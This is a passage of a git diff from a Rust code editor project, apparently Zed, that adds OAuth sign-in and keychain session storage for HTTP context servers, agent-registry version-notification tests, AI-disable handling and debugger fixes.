None, + default_model: None, + favorite_models: Vec::new(), + default_config_options: HashMap::default(), + favorite_config_option_values: HashMap::default(), + } + .into(), + ) + }) + .collect(), + ), + cx, + ); + }); + } + + fn create_agent_server_store(cx: &mut TestAppContext) -> gpui::Entity { + cx.update(|cx| { + let fs: Arc = fs::FakeFs::new(cx.background_executor().clone()); + let worktree_store = + cx.new(|cx| WorktreeStore::local(false, fs.clone(), WorktreeIdCounter::get(cx))); + let project_environment = cx.new(|cx| { + crate::ProjectEnvironment::new(None, worktree_store.downgrade(), None, false, cx) + }); + let http_client = http_client::FakeHttpClient::with_404_response(); + + cx.new(|cx| { + AgentServerStore::local( + NodeRuntime::unavailable(), + fs, + project_environment, + http_client, + cx, + ) + }) + }) + } + + #[test] + fn detects_supported_archive_suffixes() { + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.zip"), + Ok(AssetKind::Zip) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.zip?download=1"), + Ok(AssetKind::Zip) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tar.gz"), + Ok(AssetKind::TarGz) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tar.gz?download=1#latest"), + Ok(AssetKind::TarGz) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tgz"), + Ok(AssetKind::TarGz) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tgz#download"), + Ok(AssetKind::TarGz) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tar.bz2"), + Ok(AssetKind::TarBz2) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tar.bz2?download=1"), + Ok(AssetKind::TarBz2) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tbz2"), + Ok(AssetKind::TarBz2) + )); + assert!(matches!( + 
asset_kind_for_archive_url("https://example.com/agent.tbz2#download"), + Ok(AssetKind::TarBz2) + )); + } + + #[test] + fn parses_github_release_archive_urls() { + let github_archive = github_release_archive_from_url( + "https://github.com/owner/repo/releases/download/release%2F2.3.5/agent.tar.bz2?download=1", + ) + .unwrap(); + + assert_eq!(github_archive.repo_name_with_owner, "owner/repo"); + assert_eq!(github_archive.tag, "release/2.3.5"); + assert_eq!(github_archive.asset_name, "agent.tar.bz2"); + } + + #[test] + fn rejects_unsupported_archive_suffixes() { + let error = asset_kind_for_archive_url("https://example.com/agent.tar.xz") + .err() + .map(|error| error.to_string()); + + assert_eq!( + error, + Some("unsupported archive type in URL: https://example.com/agent.tar.xz".to_string()), + ); + } + + #[test] + fn versioned_archive_cache_dir_includes_version_before_url_hash() { + let slash_version_dir = versioned_archive_cache_dir( + Path::new("/tmp/agents"), + Some("release/2.3.5"), + "https://example.com/agent.zip", + ); + let colon_version_dir = versioned_archive_cache_dir( + Path::new("/tmp/agents"), + Some("release:2.3.5"), + "https://example.com/agent.zip", + ); + let file_name = slash_version_dir + .file_name() + .and_then(|name| name.to_str()) + .expect("cache directory should have a file name"); + + assert!(file_name.starts_with("v_release-2.3.5_")); + assert_ne!(slash_version_dir, colon_version_dir); + } + + #[gpui::test] + fn test_version_change_sends_notification(cx: &mut TestAppContext) { + init_test_settings(cx); + let registry = init_registry(cx, vec![make_npx_agent("test-agent", "1.0.0")]); + set_registry_settings(cx, &["test-agent"]); + let store = create_agent_server_store(cx); + + // Verify the agent was registered with version 1.0.0. 
+ store.read_with(cx, |store, _| { + let entry = store + .external_agents + .get(&AgentId::new("test-agent")) + .expect("agent should be registered"); + assert_eq!( + entry.server.version().map(|v| v.to_string()), + Some("1.0.0".to_string()) + ); + }); + + // Set up a watch channel and store the tx on the agent. + let (tx, mut rx) = watch::channel::>(None); + store.update(cx, |store, _| { + let entry = store + .external_agents + .get_mut(&AgentId::new("test-agent")) + .expect("agent should be registered"); + entry.server.set_new_version_available_tx(tx); + }); + + // Update the registry to version 2.0.0. + registry.update(cx, |store, cx| { + store.set_agents(vec![make_npx_agent("test-agent", "2.0.0")], cx); + }); + cx.run_until_parked(); + + // The watch channel should have received the new version. + assert_eq!(rx.borrow().as_deref(), Some("2.0.0")); + } + + #[gpui::test] + fn test_same_version_preserves_tx(cx: &mut TestAppContext) { + init_test_settings(cx); + let registry = init_registry(cx, vec![make_npx_agent("test-agent", "1.0.0")]); + set_registry_settings(cx, &["test-agent"]); + let store = create_agent_server_store(cx); + + let (tx, mut rx) = watch::channel::>(None); + store.update(cx, |store, _| { + let entry = store + .external_agents + .get_mut(&AgentId::new("test-agent")) + .expect("agent should be registered"); + entry.server.set_new_version_available_tx(tx); + }); + + // "Refresh" the registry with the same version. + registry.update(cx, |store, cx| { + store.set_agents(vec![make_npx_agent("test-agent", "1.0.0")], cx); + }); + cx.run_until_parked(); + + // No notification should have been sent. + assert_eq!(rx.borrow().as_deref(), None); + + // The tx should have been transferred to the rebuilt agent entry. 
+ store.update(cx, |store, _| { + let entry = store + .external_agents + .get_mut(&AgentId::new("test-agent")) + .expect("agent should be registered"); + assert!( + entry.server.take_new_version_available_tx().is_some(), + "tx should have been transferred to the rebuilt agent" + ); + }); + } + + #[gpui::test] + fn test_no_tx_stored_does_not_panic_on_version_change(cx: &mut TestAppContext) { + init_test_settings(cx); + let registry = init_registry(cx, vec![make_npx_agent("test-agent", "1.0.0")]); + set_registry_settings(cx, &["test-agent"]); + let _store = create_agent_server_store(cx); + + // Update the registry without having stored any tx — should not panic. + registry.update(cx, |store, cx| { + store.set_agents(vec![make_npx_agent("test-agent", "2.0.0")], cx); + }); + cx.run_until_parked(); + } + + #[gpui::test] + fn test_multiple_agents_independent_notifications(cx: &mut TestAppContext) { + init_test_settings(cx); + let registry = init_registry( + cx, + vec![ + make_npx_agent("agent-a", "1.0.0"), + make_npx_agent("agent-b", "3.0.0"), + ], + ); + set_registry_settings(cx, &["agent-a", "agent-b"]); + let store = create_agent_server_store(cx); + + let (tx_a, mut rx_a) = watch::channel::>(None); + let (tx_b, mut rx_b) = watch::channel::>(None); + store.update(cx, |store, _| { + store + .external_agents + .get_mut(&AgentId::new("agent-a")) + .expect("agent-a should be registered") + .server + .set_new_version_available_tx(tx_a); + store + .external_agents + .get_mut(&AgentId::new("agent-b")) + .expect("agent-b should be registered") + .server + .set_new_version_available_tx(tx_b); + }); + + // Update only agent-a to a new version; agent-b stays the same. + registry.update(cx, |store, cx| { + store.set_agents( + vec![ + make_npx_agent("agent-a", "2.0.0"), + make_npx_agent("agent-b", "3.0.0"), + ], + cx, + ); + }); + cx.run_until_parked(); + + // agent-a should have received a notification. 
+ assert_eq!(rx_a.borrow().as_deref(), Some("2.0.0")); + + // agent-b should NOT have received a notification. + assert_eq!(rx_b.borrow().as_deref(), None); + + // agent-b's tx should have been transferred. + store.update(cx, |store, _| { + assert!( + store + .external_agents + .get_mut(&AgentId::new("agent-b")) + .expect("agent-b should be registered") + .server + .take_new_version_available_tx() + .is_some(), + "agent-b tx should have been transferred" + ); + }); + } +} diff --git a/crates/project/src/buffer_store.rs b/crates/project/src/buffer_store.rs index 9faf80b7ac00002c005df3a3b1e0674dcdd4cc81..d2f05a119a1883a1ec744b40d4cdb467074d3c83 100644 --- a/crates/project/src/buffer_store.rs +++ b/crates/project/src/buffer_store.rs @@ -527,7 +527,10 @@ impl LocalBufferStore { let new_file = if let Some(entry) = snapshot_entry { File { disk_state: match entry.mtime { - Some(mtime) => DiskState::Present { mtime }, + Some(mtime) => DiskState::Present { + mtime, + size: entry.size, + }, None => old_file.disk_state, }, is_local: true, @@ -869,7 +872,6 @@ impl BufferStore { entry .insert( - // todo(lw): hot foreground spawn cx.spawn(async move |this, cx| { let load_result = load_buffer.await; this.update(cx, |this, _cx| { diff --git a/crates/project/src/context_server_store.rs b/crates/project/src/context_server_store.rs index 88dc64fcbe8795ae4826dcaa2813744f525b9258..7b9fc16f10022805ea62df2f8b3df279fc96ae3d 100644 --- a/crates/project/src/context_server_store.rs +++ b/crates/project/src/context_server_store.rs @@ -7,10 +7,16 @@ use std::time::Duration; use anyhow::{Context as _, Result}; use collections::{HashMap, HashSet}; +use context_server::oauth::{self, McpOAuthTokenProvider, OAuthDiscovery, OAuthSession}; +use context_server::transport::{HttpTransport, TransportError}; use context_server::{ContextServer, ContextServerCommand, ContextServerId}; -use futures::{FutureExt as _, future::Either, future::join_all}; +use credentials_provider::CredentialsProvider; +use 
futures::future::Either; +use futures::{FutureExt as _, StreamExt as _, future::join_all}; use gpui::{App, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, actions}; +use http_client::HttpClient; use itertools::Itertools; +use rand::Rng as _; use registry::ContextServerDescriptorRegistry; use remote::RemoteClient; use rpc::{AnyProtoClient, TypedEnvelope, proto}; @@ -45,6 +51,12 @@ pub enum ContextServerStatus { Running, Stopped, Error(Arc), + /// The server returned 401 and OAuth authorization is needed. The UI + /// should show an "Authenticate" button. + AuthRequired, + /// The OAuth browser flow is in progress — the user has been redirected + /// to the authorization server and we're waiting for the callback. + Authenticating, } impl ContextServerStatus { @@ -54,6 +66,8 @@ impl ContextServerStatus { ContextServerState::Running { .. } => ContextServerStatus::Running, ContextServerState::Stopped { .. } => ContextServerStatus::Stopped, ContextServerState::Error { error, .. } => ContextServerStatus::Error(error.clone()), + ContextServerState::AuthRequired { .. } => ContextServerStatus::AuthRequired, + ContextServerState::Authenticating { .. } => ContextServerStatus::Authenticating, } } } @@ -77,24 +91,42 @@ enum ContextServerState { configuration: Arc, error: Arc, }, + /// The server requires OAuth authorization before it can be used. The + /// `OAuthDiscovery` holds everything needed to start the browser flow. + AuthRequired { + server: Arc, + configuration: Arc, + discovery: Arc, + }, + /// The OAuth browser flow is in progress. The user has been redirected + /// to the authorization server and we're waiting for the callback. + Authenticating { + server: Arc, + configuration: Arc, + _task: Task<()>, + }, } impl ContextServerState { pub fn server(&self) -> Arc { match self { - ContextServerState::Starting { server, .. } => server.clone(), - ContextServerState::Running { server, .. 
} => server.clone(), - ContextServerState::Stopped { server, .. } => server.clone(), - ContextServerState::Error { server, .. } => server.clone(), + ContextServerState::Starting { server, .. } + | ContextServerState::Running { server, .. } + | ContextServerState::Stopped { server, .. } + | ContextServerState::Error { server, .. } + | ContextServerState::AuthRequired { server, .. } + | ContextServerState::Authenticating { server, .. } => server.clone(), } } pub fn configuration(&self) -> Arc { match self { - ContextServerState::Starting { configuration, .. } => configuration.clone(), - ContextServerState::Running { configuration, .. } => configuration.clone(), - ContextServerState::Stopped { configuration, .. } => configuration.clone(), - ContextServerState::Error { configuration, .. } => configuration.clone(), + ContextServerState::Starting { configuration, .. } + | ContextServerState::Running { configuration, .. } + | ContextServerState::Stopped { configuration, .. } + | ContextServerState::Error { configuration, .. } + | ContextServerState::AuthRequired { configuration, .. } + | ContextServerState::Authenticating { configuration, .. } => configuration.clone(), } } } @@ -126,6 +158,15 @@ impl ContextServerConfiguration { } } + pub fn has_static_auth_header(&self) -> bool { + match self { + ContextServerConfiguration::Http { headers, .. } => headers + .keys() + .any(|k| k.eq_ignore_ascii_case("authorization")), + _ => false, + } + } + pub fn remote(&self) -> bool { match self { ContextServerConfiguration::Custom { remote, .. 
} => *remote, @@ -222,6 +263,7 @@ pub struct ContextServerStore { update_servers_task: Option>>, context_server_factory: Option, needs_server_update: bool, + ai_disabled: bool, _subscriptions: Vec, } @@ -377,23 +419,42 @@ impl ContextServerStore { cx: &mut Context, ) -> Self { let mut subscriptions = vec![cx.observe_global::(move |this, cx| { + let ai_disabled = DisableAiSettings::get_global(cx).disable_ai; + let ai_was_disabled = this.ai_disabled; + this.ai_disabled = ai_disabled; + let settings = &Self::resolve_project_settings(&this.worktree_store, cx).context_servers; - if &this.context_server_settings == settings { + let settings_changed = &this.context_server_settings != settings; + + if settings_changed { + this.context_server_settings = settings.clone(); + } + + // When AI is disabled, stop all running servers + if ai_disabled { + let server_ids: Vec<_> = this.servers.keys().cloned().collect(); + for id in server_ids { + this.stop_server(&id, cx).log_err(); + } return; } - this.context_server_settings = settings.clone(); - if maintain_server_loop { + + // Trigger updates if AI was re-enabled or settings changed + if maintain_server_loop && (ai_was_disabled || settings_changed) { this.available_context_servers_changed(cx); } })]; if maintain_server_loop { subscriptions.push(cx.observe(®istry, |this, _registry, cx| { - this.available_context_servers_changed(cx); + if !DisableAiSettings::get_global(cx).disable_ai { + this.available_context_servers_changed(cx); + } })); } + let ai_disabled = DisableAiSettings::get_global(cx).disable_ai; let mut this = Self { state, _subscriptions: subscriptions, @@ -404,12 +465,13 @@ impl ContextServerStore { project: weak_project, registry, needs_server_update: false, + ai_disabled, servers: HashMap::default(), server_ids: Default::default(), update_servers_task: None, context_server_factory, }; - if maintain_server_loop { + if maintain_server_loop && !DisableAiSettings::get_global(cx).disable_ai { 
this.available_context_servers_changed(cx); } this @@ -496,9 +558,10 @@ impl ContextServerStore { pub fn start_server(&mut self, server: Arc, cx: &mut Context) { cx.spawn(async move |this, cx| { let this = this.upgrade().context("Context server store dropped")?; + let id = server.id(); let settings = this .update(cx, |this, _| { - this.context_server_settings.get(&server.id().0).cloned() + this.context_server_settings.get(&id.0).cloned() }) .context("Failed to get context server settings")?; @@ -511,7 +574,7 @@ impl ContextServerStore { }); let configuration = ContextServerConfiguration::from_settings( settings, - server.id(), + id.clone(), registry, worktree_store, cx, @@ -569,7 +632,11 @@ impl ContextServerStore { let id = server.id(); if matches!( self.servers.get(&id), - Some(ContextServerState::Starting { .. } | ContextServerState::Running { .. }) + Some( + ContextServerState::Starting { .. } + | ContextServerState::Running { .. } + | ContextServerState::Authenticating { .. }, + ) ) { self.stop_server(&id, cx).log_err(); } @@ -579,38 +646,20 @@ impl ContextServerStore { let configuration = configuration.clone(); async move |this, cx| { - match server.clone().start(cx).await { + let new_state = match server.clone().start(cx).await { Ok(_) => { debug_assert!(server.client().is_some()); - - this.update(cx, |this, cx| { - this.update_server_state( - id.clone(), - ContextServerState::Running { - server, - configuration, - }, - cx, - ) - }) - .log_err() - } - Err(err) => { - log::error!("{} context server failed to start: {}", id, err); - this.update(cx, |this, cx| { - this.update_server_state( - id.clone(), - ContextServerState::Error { - configuration, - server, - error: err.to_string().into(), - }, - cx, - ) - }) - .log_err() + ContextServerState::Running { + server, + configuration, + } } + Err(err) => resolve_start_failure(&id, err, server, configuration, cx).await, }; + this.update(cx, |this, cx| { + this.update_server_state(id.clone(), new_state, cx) + }) + 
.log_err(); } }); @@ -630,6 +679,20 @@ impl ContextServerStore { .servers .remove(id) .context("Context server not found")?; + + if let ContextServerConfiguration::Http { url, .. } = state.configuration().as_ref() { + let server_url = url.clone(); + let id = id.clone(); + cx.spawn(async move |_this, cx| { + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + if let Err(err) = Self::clear_session(&credentials_provider, &server_url, &cx).await + { + log::warn!("{} failed to clear OAuth session on removal: {}", id, err); + } + }) + .detach(); + } + drop(state); cx.emit(ServerStatusChangedEvent { server_id: id.clone(), @@ -721,29 +784,70 @@ impl ContextServerStore { configuration }; + if let Some(server) = this.update(cx, |this, _| { + this.context_server_factory + .as_ref() + .map(|factory| factory(id.clone(), configuration.clone())) + })? { + return Ok((server, configuration)); + } + + let cached_token_provider: Option> = + if let ContextServerConfiguration::Http { url, .. 
} = configuration.as_ref() { + if configuration.has_static_auth_header() { + None + } else { + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + let http_client = cx.update(|cx| cx.http_client()); + + match Self::load_session(&credentials_provider, url, &cx).await { + Ok(Some(session)) => { + log::info!("{} loaded cached OAuth session from keychain", id); + Some(Self::create_oauth_token_provider( + &id, + url, + session, + http_client, + credentials_provider, + cx, + )) + } + Ok(None) => None, + Err(err) => { + log::warn!("{} failed to load cached OAuth session: {}", id, err); + None + } + } + } + } else { + None + }; + let server: Arc = this.update(cx, |this, cx| { let global_timeout = Self::resolve_project_settings(&this.worktree_store, cx).context_server_timeout; - if let Some(factory) = this.context_server_factory.as_ref() { - return anyhow::Ok(factory(id.clone(), configuration.clone())); - } - match configuration.as_ref() { ContextServerConfiguration::Http { url, headers, timeout, - } => anyhow::Ok(Arc::new(ContextServer::http( - id, - url, - headers.clone(), - cx.http_client(), - cx.background_executor().clone(), - Some(Duration::from_secs( - timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS), - )), - )?)), + } => { + let transport = HttpTransport::new_with_token_provider( + cx.http_client(), + url.to_string(), + headers.clone(), + cx.background_executor().clone(), + cached_token_provider.clone(), + ); + anyhow::Ok(Arc::new(ContextServer::new_with_timeout( + id, + Arc::new(transport), + Some(Duration::from_secs( + timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS), + )), + ))) + } _ => { let mut command = configuration .command() @@ -840,6 +944,310 @@ impl ContextServerStore { ProjectSettings::get(location, cx) } + fn create_oauth_token_provider( + id: &ContextServerId, + server_url: &url::Url, + session: OAuthSession, + http_client: Arc, + credentials_provider: Arc, + cx: &mut AsyncApp, + ) -> Arc { + let 
(token_refresh_tx, mut token_refresh_rx) = futures::channel::mpsc::unbounded(); + let id = id.clone(); + let server_url = server_url.clone(); + + cx.spawn(async move |cx| { + while let Some(refreshed_session) = token_refresh_rx.next().await { + if let Err(err) = + Self::store_session(&credentials_provider, &server_url, &refreshed_session, &cx) + .await + { + log::warn!("{} failed to persist refreshed OAuth session: {}", id, err); + } + } + log::debug!("{} OAuth session persistence task ended", id); + }) + .detach(); + + Arc::new(McpOAuthTokenProvider::new( + session, + http_client, + Some(token_refresh_tx), + )) + } + + /// Initiate the OAuth browser flow for a server in the `AuthRequired` state. + /// + /// This starts a loopback HTTP callback server on an ephemeral port, builds + /// the authorization URL, opens the user's browser, waits for the callback, + /// exchanges the code for tokens, persists them in the keychain, and restarts + /// the server with the new token provider. + pub fn authenticate_server( + &mut self, + id: &ContextServerId, + cx: &mut Context, + ) -> Result<()> { + let state = self.servers.get(id).context("Context server not found")?; + + let (discovery, server, configuration) = match state { + ContextServerState::AuthRequired { + discovery, + server, + configuration, + } => (discovery.clone(), server.clone(), configuration.clone()), + _ => anyhow::bail!("Server is not in AuthRequired state"), + }; + + let id = id.clone(); + + let task = cx.spawn({ + let id = id.clone(); + let server = server.clone(); + let configuration = configuration.clone(); + async move |this, cx| { + let result = Self::run_oauth_flow( + this.clone(), + id.clone(), + discovery.clone(), + configuration.clone(), + cx, + ) + .await; + + if let Err(err) = &result { + log::error!("{} OAuth authentication failed: {:?}", id, err); + // Transition back to AuthRequired so the user can retry + // rather than landing in a terminal Error state. 
+ this.update(cx, |this, cx| { + this.update_server_state( + id.clone(), + ContextServerState::AuthRequired { + server, + configuration, + discovery, + }, + cx, + ) + }) + .log_err(); + } + } + }); + + self.update_server_state( + id, + ContextServerState::Authenticating { + server, + configuration, + _task: task, + }, + cx, + ); + + Ok(()) + } + + async fn run_oauth_flow( + this: WeakEntity, + id: ContextServerId, + discovery: Arc, + configuration: Arc, + cx: &mut AsyncApp, + ) -> Result<()> { + let resource = oauth::canonical_server_uri(&discovery.resource_metadata.resource); + let pkce = oauth::generate_pkce_challenge(); + + let mut state_bytes = [0u8; 32]; + rand::rng().fill(&mut state_bytes); + let state_param: String = state_bytes.iter().map(|b| format!("{:02x}", b)).collect(); + + // Start a loopback HTTP server on an ephemeral port. The redirect URI + // includes this port so the browser sends the callback directly to our + // process. + let (redirect_uri, callback_rx) = oauth::start_callback_server() + .await + .context("Failed to start OAuth callback server")?; + + let http_client = cx.update(|cx| cx.http_client()); + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + let server_url = match configuration.as_ref() { + ContextServerConfiguration::Http { url, .. } => url.clone(), + _ => anyhow::bail!("OAuth authentication only supported for HTTP servers"), + }; + + let client_registration = + oauth::resolve_client_registration(&http_client, &discovery, &redirect_uri) + .await + .context("Failed to resolve OAuth client registration")?; + + let auth_url = oauth::build_authorization_url( + &discovery.auth_server_metadata, + &client_registration.client_id, + &redirect_uri, + &discovery.scopes, + &resource, + &pkce, + &state_param, + ); + + cx.update(|cx| cx.open_url(auth_url.as_str())); + + let callback = callback_rx + .await + .map_err(|_| { + anyhow::anyhow!("OAuth callback server was shut down before receiving a response") + })? 
+ .context("OAuth callback server received an invalid request")?; + + if callback.state != state_param { + anyhow::bail!("OAuth state parameter mismatch (possible CSRF)"); + } + + let tokens = oauth::exchange_code( + &http_client, + &discovery.auth_server_metadata, + &callback.code, + &client_registration.client_id, + &redirect_uri, + &pkce.verifier, + &resource, + ) + .await + .context("Failed to exchange authorization code for tokens")?; + + let session = OAuthSession { + token_endpoint: discovery.auth_server_metadata.token_endpoint.clone(), + resource: discovery.resource_metadata.resource.clone(), + client_registration, + tokens, + }; + + Self::store_session(&credentials_provider, &server_url, &session, cx) + .await + .context("Failed to persist OAuth session in keychain")?; + + let token_provider = Self::create_oauth_token_provider( + &id, + &server_url, + session, + http_client.clone(), + credentials_provider, + cx, + ); + + let new_server = this.update(cx, |this, cx| { + let global_timeout = + Self::resolve_project_settings(&this.worktree_store, cx).context_server_timeout; + + match configuration.as_ref() { + ContextServerConfiguration::Http { + url, + headers, + timeout, + } => { + let transport = HttpTransport::new_with_token_provider( + http_client.clone(), + url.to_string(), + headers.clone(), + cx.background_executor().clone(), + Some(token_provider.clone()), + ); + Ok(Arc::new(ContextServer::new_with_timeout( + id.clone(), + Arc::new(transport), + Some(Duration::from_secs( + timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS), + )), + ))) + } + _ => anyhow::bail!("OAuth authentication only supported for HTTP servers"), + } + })??; + + this.update(cx, |this, cx| { + this.run_server(new_server, configuration, cx); + })?; + + Ok(()) + } + + /// Store the full OAuth session in the system keychain, keyed by the + /// server's canonical URI. 
+ async fn store_session( + credentials_provider: &Arc, + server_url: &url::Url, + session: &OAuthSession, + cx: &AsyncApp, + ) -> Result<()> { + let key = Self::keychain_key(server_url); + let json = serde_json::to_string(session)?; + credentials_provider + .write_credentials(&key, "mcp-oauth", json.as_bytes(), cx) + .await + } + + /// Load the full OAuth session from the system keychain for the given + /// server URL. + async fn load_session( + credentials_provider: &Arc, + server_url: &url::Url, + cx: &AsyncApp, + ) -> Result> { + let key = Self::keychain_key(server_url); + match credentials_provider.read_credentials(&key, cx).await? { + Some((_username, password_bytes)) => { + let session: OAuthSession = serde_json::from_slice(&password_bytes)?; + Ok(Some(session)) + } + None => Ok(None), + } + } + + /// Clear the stored OAuth session from the system keychain. + async fn clear_session( + credentials_provider: &Arc, + server_url: &url::Url, + cx: &AsyncApp, + ) -> Result<()> { + let key = Self::keychain_key(server_url); + credentials_provider.delete_credentials(&key, cx).await + } + + fn keychain_key(server_url: &url::Url) -> String { + format!("mcp-oauth:{}", oauth::canonical_server_uri(server_url)) + } + + /// Log out of an OAuth-authenticated MCP server: clear the stored OAuth + /// session from the keychain and stop the server. + pub fn logout_server(&mut self, id: &ContextServerId, cx: &mut Context) -> Result<()> { + let state = self.servers.get(id).context("Context server not found")?; + let configuration = state.configuration(); + + let server_url = match configuration.as_ref() { + ContextServerConfiguration::Http { url, .. 
} => url.clone(), + _ => anyhow::bail!("logout only applies to HTTP servers with OAuth"), + }; + + let id = id.clone(); + self.stop_server(&id, cx)?; + + cx.spawn(async move |this, cx| { + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + if let Err(err) = Self::clear_session(&credentials_provider, &server_url, &cx).await { + log::error!("{} failed to clear OAuth session: {}", id, err); + } + // Trigger server recreation so the next start uses a fresh + // transport without the old (now-invalidated) token provider. + this.update(cx, |this, cx| { + this.available_context_servers_changed(cx); + }) + .log_err(); + }) + .detach(); + + Ok(()) + } + fn update_server_state( &mut self, id: ContextServerId, @@ -993,3 +1401,104 @@ impl ContextServerStore { Ok(()) } } + +/// Determines the appropriate server state after a start attempt fails. +/// +/// When the error is an HTTP 401 with no static auth header configured, +/// attempts OAuth discovery so the UI can offer an authentication flow. +async fn resolve_start_failure( + id: &ContextServerId, + err: anyhow::Error, + server: Arc, + configuration: Arc, + cx: &AsyncApp, +) -> ContextServerState { + let www_authenticate = err.downcast_ref::().map(|e| match e { + TransportError::AuthRequired { www_authenticate } => www_authenticate.clone(), + }); + + if www_authenticate.is_some() && configuration.has_static_auth_header() { + log::warn!("{id} received 401 with a static Authorization header configured"); + return ContextServerState::Error { + configuration, + server, + error: "Server returned 401 Unauthorized. Check your configured Authorization header." + .into(), + }; + } + + let server_url = match configuration.as_ref() { + ContextServerConfiguration::Http { url, .. 
} if !configuration.has_static_auth_header() => { + url.clone() + } + _ => { + if www_authenticate.is_some() { + log::error!("{id} got OAuth 401 on a non-HTTP transport or with static auth"); + } else { + log::error!("{id} context server failed to start: {err}"); + } + return ContextServerState::Error { + configuration, + server, + error: err.to_string().into(), + }; + } + }; + + // When the error is NOT a 401 but there is a cached OAuth session in the + // keychain, the session is likely stale/expired and caused the failure + // (e.g. timeout because the server rejected the token silently). Clear it + // so the next start attempt can get a clean 401 and trigger the auth flow. + if www_authenticate.is_none() { + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + match ContextServerStore::load_session(&credentials_provider, &server_url, cx).await { + Ok(Some(_)) => { + log::info!("{id} start failed with a cached OAuth session present; clearing it"); + ContextServerStore::clear_session(&credentials_provider, &server_url, cx) + .await + .log_err(); + } + _ => { + log::error!("{id} context server failed to start: {err}"); + return ContextServerState::Error { + configuration, + server, + error: err.to_string().into(), + }; + } + } + } + + let default_www_authenticate = oauth::WwwAuthenticate { + resource_metadata: None, + scope: None, + error: None, + error_description: None, + }; + let www_authenticate = www_authenticate + .as_ref() + .unwrap_or(&default_www_authenticate); + let http_client = cx.update(|cx| cx.http_client()); + + match context_server::oauth::discover(&http_client, &server_url, www_authenticate).await { + Ok(discovery) => { + log::info!( + "{id} requires OAuth authorization (auth server: {})", + discovery.auth_server_metadata.issuer, + ); + ContextServerState::AuthRequired { + server, + configuration, + discovery: Arc::new(discovery), + } + } + Err(discovery_err) => { + log::error!("{id} OAuth discovery failed: 
{discovery_err}"); + ContextServerState::Error { + configuration, + server, + error: format!("OAuth discovery failed: {discovery_err}").into(), + } + } + } +} diff --git a/crates/project/src/debugger/session.rs b/crates/project/src/debugger/session.rs index 2430d6c1024c61bb9af984c914df9c308c4cb64f..87e11cfd97a2f63bba3cefca671e4413deb6765f 100644 --- a/crates/project/src/debugger/session.rs +++ b/crates/project/src/debugger/session.rs @@ -2187,21 +2187,27 @@ impl Session { self.capabilities.supports_restart_request.unwrap_or(false) && !self.is_terminated(); self.restart_task = Some(cx.spawn(async move |this, cx| { - let _ = this.update(cx, |session, cx| { + this.update(cx, |session, cx| { if supports_dap_restart { - session - .request( - RestartCommand { - raw: args.unwrap_or(Value::Null), - }, - Self::fallback_to_manual_restart, - cx, - ) - .detach(); + session.request( + RestartCommand { + raw: args.unwrap_or(Value::Null), + }, + Self::fallback_to_manual_restart, + cx, + ) } else { cx.emit(SessionStateEvent::Restart); + Task::ready(None) } - }); + }) + .unwrap_or_else(|_| Task::ready(None)) + .await; + + this.update(cx, |session, _cx| { + session.restart_task = None; + }) + .ok(); })); } @@ -2645,10 +2651,40 @@ impl Session { self.fetch( command, move |this, variables, cx| { - let Some(variables) = variables.log_err() else { + let Some(mut variables) = variables.log_err() else { return; }; + if this.adapter.0.as_ref() == "Debugpy" { + for variable in variables.iter_mut() { + if variable.type_ == Some("str".into()) { + // reverse Python repr() escaping + let mut unescaped = String::with_capacity(variable.value.len()); + let mut chars = variable.value.chars(); + while let Some(c) = chars.next() { + if c != '\\' { + unescaped.push(c); + } else { + match chars.next() { + Some('\\') => unescaped.push('\\'), + Some('n') => unescaped.push('\n'), + Some('t') => unescaped.push('\t'), + Some('r') => unescaped.push('\r'), + Some('\'') => unescaped.push('\''), + Some('"') => 
unescaped.push('"'), + Some(c) => { + unescaped.push('\\'); + unescaped.push(c); + } + None => {} + } + } + } + variable.value = unescaped; + } + } + } + this.active_snapshot .variables .insert(variables_reference, variables); diff --git a/crates/project/src/debugger/test.rs b/crates/project/src/debugger/test.rs index 53b88323e6326fe7d6d74f79a5e92845514c6b61..7ccbafa0e5507e3b7362a31df5170e285d7532f0 100644 --- a/crates/project/src/debugger/test.rs +++ b/crates/project/src/debugger/test.rs @@ -1,3 +1,4 @@ +#![expect(clippy::result_large_err)] use std::{path::Path, sync::Arc}; use dap::client::DebugAdapterClient; diff --git a/crates/project/src/environment.rs b/crates/project/src/environment.rs index 6a7f0311d04f14941b21ee9e32bda0faec2783b5..8156e172b91796ec3a9ef9446188a14bd537887e 100644 --- a/crates/project/src/environment.rs +++ b/crates/project/src/environment.rs @@ -194,6 +194,27 @@ impl ProjectEnvironment { .unwrap_or_else(|| Task::ready(None).shared()) } + /// Returns the project environment using the default worktree path. + /// This ensures that project-specific environment variables (e.g. from `.envrc`) + /// are loaded from the project directory rather than the home directory. + pub fn default_environment( + &mut self, + cx: &mut App, + ) -> Shared>>> { + let abs_path = self + .worktree_store + .read_with(cx, |worktree_store, cx| { + crate::Project::default_visible_worktree_paths(worktree_store, cx) + .into_iter() + .next() + }) + .ok() + .flatten() + .map(|path| Arc::::from(path)) + .unwrap_or_else(|| paths::home_dir().as_path().into()); + self.local_directory_environment(&Shell::System, abs_path, cx) + } + /// Returns the project environment, if possible. /// If the project was opened from the CLI, then the inherited CLI environment is returned. 
